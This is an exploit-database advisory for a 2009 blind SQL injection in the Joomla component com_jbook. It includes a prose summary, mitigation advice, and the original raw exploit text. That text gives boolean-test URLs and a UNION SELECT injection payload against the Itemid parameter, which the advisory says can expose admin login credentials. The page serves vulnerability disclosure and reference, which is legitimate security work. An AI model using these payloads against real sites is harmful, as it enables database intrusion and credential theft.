Joomla Component com_jbook Blind SQL-injection Vulnerability

vendor:

com_jbook

by:

Fl0riX

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: com_jbook

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_jbook Blind SQL-injection Vulnerability

This vulnerability allows an attacker to gain access to admin login credentials. The vulnerability is caused due to the lack of proper input validation of user-supplied data. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can result in the execution of arbitrary SQL commands in the back-end database.

Mitigation:

Input validation should be implemented to filter out malicious characters.

Source

Exploit-DB raw data:

#############################################################
#        Joomla Component com_jbook Blind SQL-injection Vulnerability                                      #
#############################################################

# author        : Fl0riX 
# Greetz    : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,F0rtys3v3n,BlackApple
# Name         : com_jbook

# Bug Type    : Blind SQL Injection

# Infection     : Admin login bilgileri al&#65533;nabilir.

# Demo Vuln.  :
TRUE(+)
&#65533; http:/server/index.php?option=com_jbook&Itemid=90 and 1=1
FALSE(-)
&#65533; http://server/index.php?option=com_jbook&Itemid=90 and 1=0

# Bug Fix Advice : Zararl&#65533; karakterler filtrelenmelidir.

# Greez : KinqSqlZ Crew
#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_jbook&Itemid=null/**/and/**/1=0/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

< -- bug code end of -- >